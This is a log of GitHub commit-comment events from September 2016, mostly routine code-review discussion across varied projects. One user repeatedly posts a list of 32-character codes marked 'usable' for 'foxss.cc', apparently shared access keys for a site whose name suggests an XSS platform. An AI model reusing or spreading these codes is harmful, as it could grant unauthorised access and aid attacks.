{"id":"4643214782","type":"CommitCommentEvent","actor":{"login":"Ardenian"},"repo":{"name":"Idrinth/IDotD"},"payload":{"comment":{"id":19240331,"position":72,"line":32,"path":"src/mods/text.js","commit_id":"43099c12addb0faa57a9e86916a00c84ec73cb35","created_at":"2016-09-30T12:44:39Z","updated_at":"2016-09-30T12:44:39Z","body":"Ah I see, I wasn't aware of that sense, thanks!"}},"created_at":"2016-09-30T12:44:39Z"}
{"id":"4643216013","type":"CommitCommentEvent","actor":{"login":"dhensby"},"repo":{"name":"silverstripe/silverstripe-crontask"},"payload":{"comment":{"id":19240335,"position":4,"line":133,"path":"code/controllers/CronTaskController.php","commit_id":"31fcf0c192b634df489a549cef80cd241fa9929d","created_at":"2016-09-30T12:44:56Z","updated_at":"2016-09-30T12:44:56Z","body":"This was PR'ed against master, which is SS 4 :/ not sure how it could have got against 1 - I'll push a patch"}},"created_at":"2016-09-30T12:44:56Z"}
{"id":"4643216137","type":"CommitCommentEvent","actor":{"login":"brian-brazil"},"repo":{"name":"prometheus/prometheus"},"payload":{"comment":{"id":19240336,"position":16,"line":195,"path":"config/config.go","commit_id":"4520e124403b234ef973636dc4c17e197ad423b4","created_at":"2016-09-30T12:44:58Z","updated_at":"2016-09-30T12:44:58Z","body":"> In what forum did that agreement happen?\r\n\r\nIt was on #1487\r\n\r\n> In #1957 (comment) you even touched on how to handle an aspect of having multiple endpoints...\r\n\r\nI had thought we were discussing Tom's plans to allow for in-order samples. There's no reference in the PR description to this change, and I was leaving the main review to others.\r\n\r\n> The rationale for having multiple would be if someone wants to write e.g. to a long-term storage, but also to a queuing system or other stream-processing system. What's the rationale against it?\r\n\r\nSimplicity, if someone wants to write to two places they can write a tee app.\r\n\r\nThis blindsided me as none of this had ever been discussed as even a possibility, and it's not at all clear how relabelling should work in such a setup. We know there's need for relabelling, but noone has asked for multiple endpoints.\r\n"}},"created_at":"2016-09-30T12:44:58Z"}
{"id":"4643217975","type":"CommitCommentEvent","actor":{"login":"clapierre"},"repo":{"name":"w3c/dpub-pwp-ucr"},"payload":{"comment":{"id":19240338,"position":null,"line":null,"path":null,"commit_id":"7b498c3aec46231828e83fde2d2659e9717f1cbe","created_at":"2016-09-30T12:45:23Z","updated_at":"2016-09-30T12:45:23Z","body":"Looks fine."}},"created_at":"2016-09-30T12:45:23Z"}
{"id":"4643220192","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":19240342,"position":40,"line":40,"path":"ALGORYTHMS/sort_files/files.cpp","commit_id":"a272cdb01362da9ed22e12a9979782176fc2fab3","created_at":"2016-09-30T12:45:53Z","updated_at":"2016-09-30T12:45:53Z","body":"А вот так не работает?\r\n```\r\nstd::vector <std::pair<std::string, size_t>> fstat_info {\r\n    { \"size\", stat_buf.st_size },\r\n    { \"inode\", stat_buf.st_ino },\r\n    { \"mode\", stat_buf.st_mode },\r\n    { \"nlink\", stat_buf.st_nlink },\r\n    { \"uid\", stat_buf.st_uid },\r\n    { \"gid\", stat_buf.st_gid },\r\n}\r\n```"}},"created_at":"2016-09-30T12:45:53Z"}
{"id":"4643222862","type":"CommitCommentEvent","actor":{"login":"ganniniang888"},"repo":{"name":"koolproxy/koolproxy_rules"},"payload":{"comment":{"id":19240348,"position":null,"line":null,"path":null,"commit_id":"1f0b9f1fa950ab79335262fc3ad434ce76b6c78c","created_at":"2016-09-30T12:46:29Z","updated_at":"2016-09-30T12:46:29Z","body":"foxss.cc\r\n31884\tOZCybO06FrqrHWNotvS9oyil7FcFHwk6\t可用\r\n31887\t37KWEPvLrkwQEeFfxuRDreeq3rZvgkvl\t可用\r\n31891\tyo0Vloe6ynjtkxefNfZOFIqtg8obu8pY\t可用\r\n31892\thXtdT1fAS6pAf62WbxV920kQ4nSvnYVN\t可用\r\n31893\tOYpOPIEhQ3RzDhUhsRgLUcThXQvoWCNM\t可用\r\n31894\tml8TVb1tYfly3MRvOnNYIRdeTc7PXR12\t可用\r\n31895\tuImRNaTdP2ARtqqZVitfswh9EvPDXpIe\t可用\r\n31897\tcROnopXtiyvAVUQHTzAvPv08ODdTLJCu\t可用\r\n31899\tgmELoq9Icd2S2fkFFOO19SalfYNUU26D\t可用"}},"created_at":"2016-09-30T12:46:29Z"}
{"id":"4643225891","type":"CommitCommentEvent","actor":{"login":"bun00b"},"repo":{"name":"pxlit-projects/classroom-exercise-1-bun00b"},"payload":{"comment":{"id":19240353,"position":null,"line":null,"path":null,"commit_id":"c914bb189c7888fbeaef226d087d9ca139debfdd","created_at":"2016-09-30T12:47:10Z","updated_at":"2016-09-30T12:47:10Z","body":"als ze te lui zijn om een WorkEthic mee te geven, dan default ik ze naar LazyWorkEthic :ok_hand: :ok_hand: :fire: :100:"}},"created_at":"2016-09-30T12:47:10Z"}
{"id":"4643229330","type":"CommitCommentEvent","actor":{"login":"ganniniang888"},"repo":{"name":"koolproxy/koolproxy_rules"},"payload":{"comment":{"id":19240358,"position":null,"line":null,"path":null,"commit_id":"7e847a76b86af17a8fbb78a312de60d6569c63b8","created_at":"2016-09-30T12:47:54Z","updated_at":"2016-09-30T12:47:54Z","body":"foxss.cc\r\n31884\tOZCybO06FrqrHWNotvS9oyil7FcFHwk6\t可用\r\n31887\t37KWEPvLrkwQEeFfxuRDreeq3rZvgkvl\t可用\r\n31891\tyo0Vloe6ynjtkxefNfZOFIqtg8obu8pY\t可用\r\n31892\thXtdT1fAS6pAf62WbxV920kQ4nSvnYVN\t可用\r\n31893\tOYpOPIEhQ3RzDhUhsRgLUcThXQvoWCNM\t可用\r\n31894\tml8TVb1tYfly3MRvOnNYIRdeTc7PXR12\t可用\r\n31895\tuImRNaTdP2ARtqqZVitfswh9EvPDXpIe\t可用\r\n31897\tcROnopXtiyvAVUQHTzAvPv08ODdTLJCu\t可用\r\n31899\tgmELoq9Icd2S2fkFFOO19SalfYNUU26D\t可用"}},"created_at":"2016-09-30T12:47:54Z"}
{"id":"4643230969","type":"CommitCommentEvent","actor":{"login":"ganniniang888"},"repo":{"name":"koolproxy/koolproxy_rules"},"payload":{"comment":{"id":19240371,"position":null,"line":null,"path":null,"commit_id":"354460bf91a2d86a101d1b72385a607522970919","created_at":"2016-09-30T12:48:15Z","updated_at":"2016-09-30T12:48:15Z","body":"foxss.cc\r\n31884\tOZCybO06FrqrHWNotvS9oyil7FcFHwk6\t可用\r\n31887\t37KWEPvLrkwQEeFfxuRDreeq3rZvgkvl\t可用\r\n31891\tyo0Vloe6ynjtkxefNfZOFIqtg8obu8pY\t可用\r\n31892\thXtdT1fAS6pAf62WbxV920kQ4nSvnYVN\t可用\r\n31893\tOYpOPIEhQ3RzDhUhsRgLUcThXQvoWCNM\t可用\r\n31894\tml8TVb1tYfly3MRvOnNYIRdeTc7PXR12\t可用\r\n31895\tuImRNaTdP2ARtqqZVitfswh9EvPDXpIe\t可用\r\n31897\tcROnopXtiyvAVUQHTzAvPv08ODdTLJCu\t可用\r\n31899\tgmELoq9Icd2S2fkFFOO19SalfYNUU26D\t可用"}},"created_at":"2016-09-30T12:48:15Z"}
{"id":"4643231295","type":"CommitCommentEvent","actor":{"login":"ganniniang888"},"repo":{"name":"koolproxy/koolproxy_rules"},"payload":{"comment":{"id":19240372,"position":null,"line":null,"path":null,"commit_id":"8a3c6075c1cc6bef7ba4a478f325040f227f531e","created_at":"2016-09-30T12:48:19Z","updated_at":"2016-09-30T12:48:19Z","body":"foxss.cc\r\n31884\tOZCybO06FrqrHWNotvS9oyil7FcFHwk6\t可用\r\n31887\t37KWEPvLrkwQEeFfxuRDreeq3rZvgkvl\t可用\r\n31891\tyo0Vloe6ynjtkxefNfZOFIqtg8obu8pY\t可用\r\n31892\thXtdT1fAS6pAf62WbxV920kQ4nSvnYVN\t可用\r\n31893\tOYpOPIEhQ3RzDhUhsRgLUcThXQvoWCNM\t可用\r\n31894\tml8TVb1tYfly3MRvOnNYIRdeTc7PXR12\t可用\r\n31895\tuImRNaTdP2ARtqqZVitfswh9EvPDXpIe\t可用\r\n31897\tcROnopXtiyvAVUQHTzAvPv08ODdTLJCu\t可用\r\n31899\tgmELoq9Icd2S2fkFFOO19SalfYNUU26D\t可用"}},"created_at":"2016-09-30T12:48:19Z"}
{"id":"4643231321","type":"CommitCommentEvent","actor":{"login":"hqnghi88"},"repo":{"name":"gama-platform/gama"},"payload":{"comment":{"id":19240373,"position":null,"line":null,"path":null,"commit_id":"12651341732477ce9a5b16216ad6cc13e56a731d","created_at":"2016-09-30T12:48:19Z","updated_at":"2016-09-30T12:48:19Z","body":"Thank you for all your contributions. Hope to see you again! Good luck and have a good continuation"}},"created_at":"2016-09-30T12:48:19Z"}
{"id":"4643234425","type":"CommitCommentEvent","actor":{"login":"mingxuWang"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19240377,"position":341,"line":341,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-30T12:49:01Z","updated_at":"2016-09-30T12:49:01Z","body":"没必要缓存this"}},"created_at":"2016-09-30T12:49:01Z"}
{"id":"4643236715","type":"CommitCommentEvent","actor":{"login":"butenkor"},"repo":{"name":"sphereio/sphere-node-sdk"},"payload":{"comment":{"id":19240392,"position":null,"line":null,"path":null,"commit_id":"4d48f582ff9a6708edd62631f75131abd775a999","created_at":"2016-09-30T12:49:31Z","updated_at":"2016-09-30T12:49:31Z","body":"Thanks for release 👍 Please add release notes: https://github.com/sphereio/sphere-node-sdk/releases/tag/v1.15.5"}},"created_at":"2016-09-30T12:49:31Z"}
{"id":"4643238468","type":"CommitCommentEvent","actor":{"login":"bamboolix"},"repo":{"name":"bamboolix/fables"},"payload":{"comment":{"id":19240396,"position":22,"line":121,"path":"index.js","commit_id":"c5a126d45e3a125670838adeda96620ff2b7841c","created_at":"2016-09-30T12:49:56Z","updated_at":"2016-09-30T12:49:56Z","body":"Factorisation ne serait-il pas plus judicieux d'avoir une callback dans laquelle on passerait les paramètres d'état d'échec ou de réussite ?"}},"created_at":"2016-09-30T12:49:56Z"}
{"id":"4643238960","type":"CommitCommentEvent","actor":{"login":"stijnvanhoey"},"repo":{"name":"PieterjanVerhelst/resident-eel-polder-analysis"},"payload":{"comment":{"id":19240400,"position":38,"line":38,"path":"src/Creeks_dataH_analysis.R","commit_id":"3c9cda45a0d31e1466910a14a01ee825f962a2cd","created_at":"2016-09-30T12:50:02Z","updated_at":"2016-09-30T12:50:02Z","body":"The lines 37 & 39 seems to perform a redundant functionality, as the `as.POSIXct` can also directly  interpret the character datetime strings. I expect the aimed result is a `POSIXct` instance (not a `POSIXlt`)?"}},"created_at":"2016-09-30T12:50:02Z"}
{"id":"4643242508","type":"CommitCommentEvent","actor":{"login":"huluoyang"},"repo":{"name":"FreeCodeCampChina/freecodecamp.cn"},"payload":{"comment":{"id":19240403,"position":null,"line":null,"path":null,"commit_id":"4b6e25bdaec776775bd33ffb17c01ce0408bce99","created_at":"2016-09-30T12:50:47Z","updated_at":"2016-09-30T12:50:47Z","body":"恩，仔细阅读测试用例，确实需要校对pre属性的值是否为true。\r\n这是FreeCodeCampChina的第一个issue啊，值得纪念。"}},"created_at":"2016-09-30T12:50:47Z"}
{"id":"4643242846","type":"CommitCommentEvent","actor":{"login":"van562"},"repo":{"name":"andreaiacono/OpenCVDemo"},"payload":{"comment":{"id":19240404,"position":null,"line":null,"path":null,"commit_id":"e681aea13d35a2f9a0d3b12c1fb175a639813f2b","created_at":"2016-09-30T12:50:52Z","updated_at":"2016-09-30T12:50:52Z","body":"Andrea,\r\nI like to see an existing code and add some on my own.  "}},"created_at":"2016-09-30T12:50:52Z"}
{"id":"4643243326","type":"CommitCommentEvent","actor":{"login":"hmtanbir"},"repo":{"name":"BDMADE/college"},"payload":{"comment":{"id":19240407,"position":5,"line":29,"path":"Gemfile","commit_id":"266640d825b571fc7053a27b5f3bb8193e9978de","created_at":"2016-09-30T12:50:57Z","updated_at":"2016-09-30T12:50:57Z","body":"remove this gem from Gemfile."}},"created_at":"2016-09-30T12:50:57Z"}
{"id":"4643245854","type":"CommitCommentEvent","actor":{"login":"andela-bmakinwa"},"repo":{"name":"andela-megwali/appifly"},"payload":{"comment":{"id":19240413,"position":19,"line":19,"path":"app/views/bookings/index.html.erb","commit_id":"a604263dedf29f457431c5382019be3397bf20bf","created_at":"2016-09-30T12:51:30Z","updated_at":"2016-09-30T12:51:30Z","body":"**Critical - Code Quality**\r\nYou should not have logic implemented in your views. Make use of helpers in this case."}},"created_at":"2016-09-30T12:51:30Z"}
{"id":"4643249674","type":"CommitCommentEvent","actor":{"login":"juliusv"},"repo":{"name":"prometheus/prometheus"},"payload":{"comment":{"id":19240419,"position":16,"line":195,"path":"config/config.go","commit_id":"4520e124403b234ef973636dc4c17e197ad423b4","created_at":"2016-09-30T12:52:20Z","updated_at":"2016-09-30T12:52:20Z","body":"I see mostly disagreements rather than agreements in #1487, but it's a long heated discussion and maybe I didn't find the right piece of it.\r\n\r\nAnyways, if you feel so strongly about it, I'm ok with making it just one again for now. I'd still like to learn more about the relabeling challenges around it. Instead of having a relabel config for a single remote write, have one config for each endpoint?"}},"created_at":"2016-09-30T12:52:20Z"}
{"id":"4643252387","type":"CommitCommentEvent","actor":{"login":"bjansen"},"repo":{"name":"ceylon/ceylon-ide-common"},"payload":{"comment":{"id":19240425,"position":null,"line":null,"path":null,"commit_id":"f844b84d16b7b80e9ed59e4f3fb4756467f1a3f1","created_at":"2016-09-30T12:52:54Z","updated_at":"2016-09-30T12:52:54Z","body":"This is for https://github.com/ceylon/ceylon-ide-intellij/issues/279"}},"created_at":"2016-09-30T12:52:54Z"}
{"id":"4643253752","type":"CommitCommentEvent","actor":{"login":"cozy1"},"repo":{"name":"rscustom/rocksmith-custom-song-toolkit"},"payload":{"comment":{"id":19240431,"position":2,"line":1,"path":"VersionInfo.txt","commit_id":"494877f8d3b4c3238c4d140f55e20af1302d2050","created_at":"2016-09-30T12:53:11Z","updated_at":"2016-09-30T12:53:11Z","body":"This file and info are being used by CFSM to determine appropriate deployment option for toolkit.  Just an fyi, most of the InnoInstaller apps are using a VersionInfo.txt file to determine deployment status of newer versions of the installed app.  If at some time we package toolkit with InnoInstaller we will already have the needed version info."}},"created_at":"2016-09-30T12:53:11Z"}
{"id":"4643253833","type":"CommitCommentEvent","actor":{"login":"bamboolix"},"repo":{"name":"bamboolix/fables"},"payload":{"comment":{"id":19240432,"position":10,"line":84,"path":"index.js","commit_id":"c5a126d45e3a125670838adeda96620ff2b7841c","created_at":"2016-09-30T12:53:12Z","updated_at":"2016-09-30T12:53:12Z","body":"Remplacer les alert() et les console.log() par des document.getElementById(\"message\").innerHTML = JSON.stringify( e )"}},"created_at":"2016-09-30T12:53:12Z"}
{"id":"4643256880","type":"CommitCommentEvent","actor":{"login":"patrickelectric"},"repo":{"name":"sithlord48/atcore"},"payload":{"comment":{"id":19240437,"position":5,"line":23,"path":"testclient/mainwindow.cpp","commit_id":"c07efd71d95db1d63a35658ee73d001f67ee58d8","created_at":"2016-09-30T12:53:50Z","updated_at":"2016-09-30T12:53:50Z","body":"deviceNotifier = Solid::DeviceNotifier::instance()"}},"created_at":"2016-09-30T12:53:50Z"}
{"id":"4643258715","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":19240445,"position":48,"line":48,"path":"ALGORYTHMS/sort_files/files.cpp","commit_id":"a272cdb01362da9ed22e12a9979782176fc2fab3","created_at":"2016-09-30T12:54:13Z","updated_at":"2016-09-30T12:54:13Z","body":"ИМХО, лучше написать без копипасты, циклом:\r\n```\r\nfor (const auto& field : std::vector<std::pair<std::string, size_t>> {\r\n    { \"Size\", stat_buf.st_size },\r\n    { \"Dev\", stat_buf.st_dev },\r\n    { \"Inode\", stat_buf.st_ino },\r\n    { \"Mode\", stat_buf.st_mode },\r\n    { \"Nlink\", stat_buf.st_nlink },\r\n    { \"Uid\", stat_buf.st_uid },\r\n    { \"Gid\", stat_buf.st_gid },\r\n    { \"rdev\", stat_buf.st_rdev },\r\n    { \"atime\", stat_buf.st_atime },\r\n    { \"mtime\", stat_buf.st_mtime },\r\n    { \"ctime\", stat_buf.st_ctime },\r\n}) {\r\n    std::cout << \"[DEL] \" << field.first \" -> \" << field.second << std::endl;\r\n}\r\n```"}},"created_at":"2016-09-30T12:54:13Z"}
{"id":"4643258752","type":"CommitCommentEvent","actor":{"login":"patrickelectric"},"repo":{"name":"sithlord48/atcore"},"payload":{"comment":{"id":19240446,"position":4,"line":22,"path":"testclient/mainwindow.cpp","commit_id":"c07efd71d95db1d63a35658ee73d001f67ee58d8","created_at":"2016-09-30T12:54:13Z","updated_at":"2016-09-30T12:54:13Z","body":"Do that in the constructor:\r\ndevices (new Solid::DeviceNotifier)"}},"created_at":"2016-09-30T12:54:13Z"}
{"id":"4643260022","type":"CommitCommentEvent","actor":{"login":"mingxuWang"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19240450,"position":441,"line":441,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-30T12:54:30Z","updated_at":"2016-09-30T12:54:30Z","body":"这个方法到底是get方法还是post方法？请求地址又发生了改变data中也携带了参数，这样的请求形式..."}},"created_at":"2016-09-30T12:54:30Z"}
{"id":"4643260807","type":"CommitCommentEvent","actor":{"login":"stijnvanhoey"},"repo":{"name":"PieterjanVerhelst/resident-eel-polder-analysis"},"payload":{"comment":{"id":19240452,"position":44,"line":44,"path":"src/Creeks_dataH_analysis.R","commit_id":"3c9cda45a0d31e1466910a14a01ee825f962a2cd","created_at":"2016-09-30T12:54:40Z","updated_at":"2016-09-30T12:54:40Z","body":"is it important to notice that this is the year/month of arrival? Maybe we should use `Arrival_month` and `Arrival_year`?"}},"created_at":"2016-09-30T12:54:40Z"}
{"id":"4643262131","type":"CommitCommentEvent","actor":{"login":"patrickelectric"},"repo":{"name":"sithlord48/atcore"},"payload":{"comment":{"id":19240455,"position":null,"line":null,"path":null,"commit_id":"c07efd71d95db1d63a35658ee73d001f67ee58d8","created_at":"2016-09-30T12:54:57Z","updated_at":"2016-09-30T12:54:57Z","body":"Do all this checks and should work :)"}},"created_at":"2016-09-30T12:54:57Z"}
{"id":"4643263906","type":"CommitCommentEvent","actor":{"login":"cozy1"},"repo":{"name":"rscustom/rocksmith-custom-song-toolkit"},"payload":{"comment":{"id":19240457,"position":22,"line":323,"path":"RocksmithTookitGUI/DLCInlayCreator/DLCInlayCreator.cs","commit_id":"a49c23221908b900c8d250ec00dfaeb407be1a33","created_at":"2016-09-30T12:55:19Z","updated_at":"2016-09-30T12:55:19Z","body":"Shit happens. ;)\r\n"}},"created_at":"2016-09-30T12:55:19Z"}
{"id":"4643264443","type":"CommitCommentEvent","actor":{"login":"daviderenger"},"repo":{"name":"Volicon/NestedReact"},"payload":{"comment":{"id":19240459,"position":null,"line":null,"path":null,"commit_id":"6ad8ecec126e6975cfef0b7126eac3ee20bb14e1","created_at":"2016-09-30T12:55:26Z","updated_at":"2016-09-30T12:55:26Z","body":"O no, I noticed that there are problems with controlled inputs only, when you have value={this.state...}\r\nThe workaround for the issues is that you dont use controlled or if you must call forceUpdate() when the state that is used in the input is changed. I just fixed all our inputs to work :) But I was thinking if the solution might be to detect if a state is used in an input and then dont use the asyncUpdate?\r\n\r\nMaybe something extra in in the state definition?\r\nstate: {\r\n  val: String.sync.value('')\r\n}\r\n\r\nOr someother way to detect it automaticly... the batch update is very good for performance in every other scenario."}},"created_at":"2016-09-30T12:55:26Z"}
{"id":"4643268255","type":"CommitCommentEvent","actor":{"login":"htobon"},"repo":{"name":"CCAFS/MARLO"},"payload":{"comment":{"id":19240464,"position":6,"line":240,"path":"marlo-web/src/main/java/org/cgiar/ccafs/marlo/action/projects/DeliverableAction.java","commit_id":"e29387bb435e2f5d27757d1ec834973a524059a0","created_at":"2016-09-30T12:56:16Z","updated_at":"2016-09-30T12:56:16Z","body":"misspelled"}},"created_at":"2016-09-30T12:56:16Z"}
{"id":"4643269586","type":"CommitCommentEvent","actor":{"login":"ezio84"},"repo":{"name":"AOSIP/platform_frameworks_base"},"payload":{"comment":{"id":19240470,"position":null,"line":null,"path":null,"commit_id":"12540055ade6faf74a1ce0951aa0eee26180d994","created_at":"2016-09-30T12:56:33Z","updated_at":"2016-09-30T12:56:33Z","body":"Hi guys, this commit was still missing something.\r\nHere's the latest, full working one: https://github.com/ezio84/pnmod-n_frameworks_base/commit/dfae07279fd28c5fdb57f6a639a2acda1d3daf5d\r\n\r\nBB!!"}},"created_at":"2016-09-30T12:56:33Z"}
{"id":"4643278809","type":"CommitCommentEvent","actor":{"login":"xlxfoxxlx"},"repo":{"name":"AOSIP/platform_frameworks_base"},"payload":{"comment":{"id":19240504,"position":null,"line":null,"path":null,"commit_id":"12540055ade6faf74a1ce0951aa0eee26180d994","created_at":"2016-09-30T12:58:29Z","updated_at":"2016-09-30T12:58:29Z","body":"Kk thanks bud\n\nOn Fri, Sep 30, 2016, 8:56 AM Ezio Lacandia Bijelkic <\nnotifications@github.com> wrote:\n\n> Hi guys, this commit was still missing something.\n> Here's the latest, full working one: ezio84/pnmod-n_frameworks_base@\n> dfae072\n> <https://github.com/ezio84/pnmod-n_frameworks_base/commit/dfae07279fd28c5fdb57f6a639a2acda1d3daf5d>\n>\n> BB!!\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/AOSIP/platform_frameworks_base/commit/12540055ade6faf74a1ce0951aa0eee26180d994#commitcomment-19240470>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABTw0SMuS2R-dYb7UWeyyMj69asHelDcks5qvQcBgaJpZM4KKr2Q>\n> .\n>\n"}},"created_at":"2016-09-30T12:58:29Z"}
{"id":"4643288166","type":"CommitCommentEvent","actor":{"login":"naugle92"},"repo":{"name":"naugle92/Plateo"},"payload":{"comment":{"id":19240519,"position":null,"line":null,"path":null,"commit_id":"6b7030e112824e503c4ae28368b1662a8665c6aa","created_at":"2016-09-30T13:00:24Z","updated_at":"2016-09-30T13:00:24Z","body":"Can't believe I spelt shortened wrong"}},"created_at":"2016-09-30T13:00:24Z"}
{"id":"4643290020","type":"CommitCommentEvent","actor":{"login":"brian-brazil"},"repo":{"name":"prometheus/prometheus"},"payload":{"comment":{"id":19240524,"position":16,"line":195,"path":"config/config.go","commit_id":"4520e124403b234ef973636dc4c17e197ad423b4","created_at":"2016-09-30T13:00:46Z","updated_at":"2016-09-30T13:00:46Z","body":"How does that work for graphite? Making `remote_write` a list excludes the possibility of any global remote write settings, and is unlikely the right way to go. \r\n\r\nI'd always presumed a single generic write with a single relabel config. If you've multiple do you want one each, one global, both? As this was previously never even on the table I've had no time to ponder the correct semantics.\r\n\r\nAdding this now means we'd also have consider other things like SD now too, and a number of other things that a single fixed endpoint lets us delay having to worry about until we've figured it out elsewhere."}},"created_at":"2016-09-30T13:00:46Z"}
{"id":"4643290878","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":19240527,"position":20,"line":20,"path":"ALGORYTHMS/sort_files/myhash.h","commit_id":"a272cdb01362da9ed22e12a9979782176fc2fab3","created_at":"2016-09-30T13:00:57Z","updated_at":"2016-09-30T13:00:57Z","body":"ИМХО\r\n`m` и `p` плохие имена, непонятно что они значат.\r\nЛучше что-нибудь вроде `module` и `prime`.\r\n\r\nКроме того, `m` и `a` лучше не инициализировать, по крайней мере не инициализировать нулём.\r\nСудя по коду дальше, где есть деление на `m` и умножение на `a`, они не должны быть равны нулю.\r\nПоэтому инициализация их нулями выглядит очень странно."}},"created_at":"2016-09-30T13:00:57Z"}
{"id":"4643291908","type":"CommitCommentEvent","actor":{"login":"MSGhero"},"repo":{"name":"HaxeFlixel/flixel"},"payload":{"comment":{"id":19240529,"position":9,"line":null,"path":"flixel/animation/FlxAnimation.hx","commit_id":"f959b9c66732cd119eb0b2c3e322506f07334782","created_at":"2016-09-30T13:01:09Z","updated_at":"2016-09-30T13:01:09Z","body":"`(default, null)`?"}},"created_at":"2016-09-30T13:01:09Z"}
{"id":"4643293048","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":19240531,"position":44,"line":44,"path":"ALGORYTHMS/sort_files/myhash.h","commit_id":"a272cdb01362da9ed22e12a9979782176fc2fab3","created_at":"2016-09-30T13:01:23Z","updated_at":"2016-09-30T13:01:23Z","body":"Typo: s/Inupt/Input/"}},"created_at":"2016-09-30T13:01:23Z"}
{"id":"4643294203","type":"CommitCommentEvent","actor":{"login":"andreaiacono"},"repo":{"name":"andreaiacono/OpenCVDemo"},"payload":{"comment":{"id":19240534,"position":null,"line":null,"path":null,"commit_id":"e681aea13d35a2f9a0d3b12c1fb175a639813f2b","created_at":"2016-09-30T13:01:37Z","updated_at":"2016-09-30T13:01:37Z","body":"from a quick search on google, I've found this: http://neuroph.sourceforge.net/tutorials/FaceRecognition/FaceRecognitionUsingNeuralNetwork.html\r\nmaybe it's a good starting point.\r\nSorry, I can't do anything more than suggesting because I never used NeuralNetworks for face recognition: OpenCV (the library I used in this project) uses Eigenfaces for doing it.\r\n\r\nHTH,\r\nAndrea"}},"created_at":"2016-09-30T13:01:37Z"}
{"id":"4643295970","type":"CommitCommentEvent","actor":{"login":"Upskxkit"},"repo":{"name":"Upskxkit/intellectus-studio.githab.io"},"payload":{"comment":{"id":19240539,"position":null,"line":null,"path":null,"commit_id":"e2305596e4707c7a0f588cd92c40a419c6b9ed88","created_at":"2016-09-30T13:02:00Z","updated_at":"2016-09-30T13:02:00Z","body":"1"}},"created_at":"2016-09-30T13:02:00Z"}
{"id":"4643297341","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"halogenOS/android_frameworks_base"},"payload":{"comment":{"id":19240543,"position":null,"line":null,"path":null,"commit_id":"544d63195a031cb0c69c4b56763fc72491fdbba4","created_at":"2016-09-30T13:02:15Z","updated_at":"2016-09-30T13:02:15Z","body":"No, but the error that the method is not found.\r\nAs you can see, it exists but under another name.\r\nSo I just added it afterwards.\r\n\r\nThis fixed setupwizard shit"}},"created_at":"2016-09-30T13:02:15Z"}
{"id":"4643297495","type":"CommitCommentEvent","actor":{"login":"facchinm"},"repo":{"name":"arduino/Arduino"},"payload":{"comment":{"id":19240545,"position":23,"line":496,"path":"hardware/arduino/avr/cores/arduino/USBCore.cpp","commit_id":"2c5dd2029807a7d3fe76ed86a81643db088b5c2c","created_at":"2016-09-30T13:02:16Z","updated_at":"2016-09-30T13:02:16Z","body":"I double checked and, indeed, we are sending `USB_DeviceDescriptor` . I always trusted the `_cdcComposite` flag to be correct but it looks I was wrong. Would you mind submitting a PR to fix this while testing it on your platform? The updated code should work on all Windows (from XP to 10) , recent Linux and OSX and enumerate correctly when plugging PluggableUSB modules."}},"created_at":"2016-09-30T13:02:16Z"}
{"id":"4643298670","type":"CommitCommentEvent","actor":{"login":"hisabimbola"},"repo":{"name":"sphereio/sphere-node-sdk"},"payload":{"comment":{"id":19240548,"position":null,"line":null,"path":null,"commit_id":"4d48f582ff9a6708edd62631f75131abd775a999","created_at":"2016-09-30T13:02:32Z","updated_at":"2016-09-30T13:02:32Z","body":"Done @butenkor [here](https://github.com/sphereio/sphere-node-sdk/releases/tag/v1.15.5)"}},"created_at":"2016-09-30T13:02:32Z"}
{"id":"4643299038","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19240549,"position":null,"line":null,"path":null,"commit_id":"10634f5993a37fe9c719fd70377d8a4f92f18ba0","created_at":"2016-09-30T13:02:36Z","updated_at":"2016-09-30T13:02:36Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#NXZsvDwOS0iqoQjERWtVgQ"}},"created_at":"2016-09-30T13:02:36Z"}
{"id":"4643299092","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"HaxeFlixel/flixel"},"payload":{"comment":{"id":19240550,"position":9,"line":null,"path":"flixel/animation/FlxAnimation.hx","commit_id":"f959b9c66732cd119eb0b2c3e322506f07334782","created_at":"2016-09-30T13:02:37Z","updated_at":"2016-09-30T13:02:37Z","body":"https://github.com/HaxeFlixel/flixel/pull/1967#issuecomment-250701567"}},"created_at":"2016-09-30T13:02:37Z"}
{"id":"4643301627","type":"CommitCommentEvent","actor":{"login":"remcotolsma"},"repo":{"name":"pronamic/wp-pronamic-ideal"},"payload":{"comment":{"id":19240553,"position":null,"line":null,"path":null,"commit_id":"e7914b1af9864e4c21db7013a5f7dce3f9e5b0b5","created_at":"2016-09-30T13:03:09Z","updated_at":"2016-09-30T13:03:09Z","body":"@rvdsteege What was the reason for this change? Administrators are already not getting this custom capability: https://github.com/pronamic/wp-pronamic-ideal/blob/develop/classes/Pronamic/WP/Pay/Admin/Install.php#L141-L145. Does it matter if the capability name is `create_payments` or `do_not_allow`? User roles with the capability `do_not_allow` still have the capability to `create_posts` (payments)."}},"created_at":"2016-09-30T13:03:09Z"}
